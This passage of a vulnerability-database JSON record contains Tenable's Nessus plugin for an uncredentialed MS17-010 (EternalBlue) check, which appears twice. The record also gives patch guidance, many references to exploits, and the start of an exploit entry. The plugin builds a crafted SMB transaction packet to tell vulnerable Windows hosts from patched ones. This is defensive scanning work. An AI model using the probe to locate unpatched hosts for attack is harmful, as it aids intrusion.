(w:plen) + # total parameter count\n\t 
raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:0) + # Max setup count\n raw_byte (b:0) + # Reserved\n\t raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = npad +\n trans +\n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n return packet;\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nfid = 0; # Invalid FID \nsetup = raw_word (w:0x23) + raw_word (w:fid); \n\npacket = my_smb_trans_and_x (setup: setup, transname:\"\\PIPE\\\");\nret = smb_sendrecv (data:packet);\nif (ret)\n status = smb_get_error_code (data:ret);\nelse\n status = NULL;\n\nNetUseDel();\n\nif(! 
isnull(status))\n{\n if(status == STATUS_INVALID_HANDLE\n || status == STATUS_ACCESS_DENIED # Win 10\n )\n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_INSUFF_SERVER_RESOURCES)\n {\n port = kb_smb_transport();\n\n report = 'Sent:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(packet)) + '\\n';\n report += 'Received:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(ret));\n\n security_report_v4(port: port, severity: SECURITY_HOLE, extra: report);\n }\n else\n {\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION request. Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION request.\"); \n}\n", "naslFamily": "Windows", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft recommends that users discontinue the use of SMBv1. SMBv1 lacks security features that were included in later SMB versions. SMBv1 can be disabled by following the vendor instructions provided in Microsoft KB2696547. Additionally, US-CERT recommends that users block SMB directly by blocking TCP port 445 on all network boundary devices. 
For SMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137 / 138 on all network boundary devices.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.8"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS(CANVAS)", "Metasploit(MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption)"]}, "lastseen": "2021-10-19T00:54:11", "differentElements": ["vpr"], "edition": 13}], "viewCount": 7210, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": 
"rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", 
"THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-22T13:00:41", "rev": 2}, "score": {"value": 8.0, "vector": "NONE", "modified": "2021-10-22T13:00:41", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97833);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/15\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n 
script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)\");\n script_summary(english:\"Checks the presence of MS17-010.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. 
Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?68fc8eff\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/\");\n # https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9d9ebf9\");\n # https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8dcab5e4\");\n # https://www.theregister.co.uk/2017/01/18/uscert_warns_admins_to_kill_smb_after_shadow_brokers_dump/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?234f8ef8\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # 
https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft\nrecommends that users discontinue the use of SMBv1. SMBv1 lacks\nsecurity features that were included in later SMB versions. SMBv1 can\nbe disabled by following the vendor instructions provided in Microsoft\nKB2696547. Additionally, US-CERT recommends that users block SMB\ndirectly by blocking TCP port 445 on all network boundary devices. For\nSMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137\n/ 138 on all network boundary devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", 
value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code (data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\n\nfunction my_smb_trans_and_x (setup, transname, param, data, max_pcount, max_dcount)\n{\n local_var header, parameters, dat, packet, ret, pad1, trans, p_offset, d_offset, plen, dlen, slen, pad2, npad;\n\n npad = pad1 = pad2 = NULL;\n\n if (session_is_unicode () == 1)\n trans = cstring (string:transname);\n else\n trans = transname;\n\n header = smb_header (Command: 
SMB_COM_TRANSACTION,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + strlen(trans);\n\n # Unicode transname should be aligned to 2 byte \n if(session_is_unicode() == 1)\n {\n npad = crap(data:'\\x00', length: (2 - p_offset % 2) % 2);\n p_offset += strlen(npad);\n }\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n plen = strlen(param);\n dlen = strlen(data);\n slen = strlen(setup);\n\n if(isnull(max_pcount)) max_pcount =0xffff;\n if(isnull(max_dcount)) max_dcount =0xffff;\n\n parameters = \n raw_word (w:plen) + # total parameter count\n\t raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:0) + # Max setup count\n raw_byte (b:0) + # Reserved\n\t raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = npad +\n trans +\n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n return packet;\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! 
get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nfid = 0; # Invalid FID \nsetup = raw_word (w:0x23) + raw_word (w:fid); \n\npacket = my_smb_trans_and_x (setup: setup, transname:\"\\PIPE\\\");\nret = smb_sendrecv (data:packet);\nif (ret)\n status = smb_get_error_code (data:ret);\nelse\n status = NULL;\n\nNetUseDel();\n\nif(! isnull(status))\n{\n if(status == STATUS_INVALID_HANDLE\n || status == STATUS_ACCESS_DENIED # Win 10\n )\n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_INSUFF_SERVER_RESOURCES)\n {\n port = kb_smb_transport();\n\n report = 'Sent:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(packet)) + '\\n';\n report += 'Received:\\n';\n report += ereg_replace(pattern:\"([0-9a-f]{1,80})\", replace:'\\\\1\\n', string:hexstr(ret));\n\n security_report_v4(port: port, severity: SECURITY_HOLE, extra: report);\n }\n else\n {\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION request. Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION request.\"); \n}\n", "naslFamily": "Windows", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft recommends that users discontinue the use of SMBv1. SMBv1 lacks security features that were included in later SMB versions. 
SMBv1 can be disabled by following the vendor instructions provided in Microsoft KB2696547. Additionally, US-CERT recommends that users block SMB directly by blocking TCP port 445 on all network boundary devices. For SMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137 / 138 on all network boundary devices. Note that boundary filtering only limits exposure from outside the perimeter; hosts on the same internal network can still reach SMB, so it is a stopgap rather than a substitute for patching or disabling SMBv1.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS(CANVAS)", "Metasploit(MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption)"], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.nessus.NessusBulletin"]}], "zdt": [{"id": "1337DAY-ID-27752", "hash": "7fd52da02c3bce063b3227f881a6928a", "type": "zdt", "bulletinFamily": "exploit", "title": "Microsoft Windows - SrvOs2FeaToNt SMB Remote Code Execution (MS17-010) Exploit", "description": "Exploit for windows platform in category remote exploits", "published": "2017-05-10T00:00:00", "modified": "2017-05-10T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/27752", "reporter": "Juan Sacco", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2018-03-19T02:05:14", "history": [], "viewCount": 41, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2018-03-19T02:05:14", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": 
"rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96704", 
"SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177", "CPAI-2017-0198", "CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0419", "CPAI-2017-0200"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2018-03-19T02:05:14", "rev": 2}}, "objectVersion": 
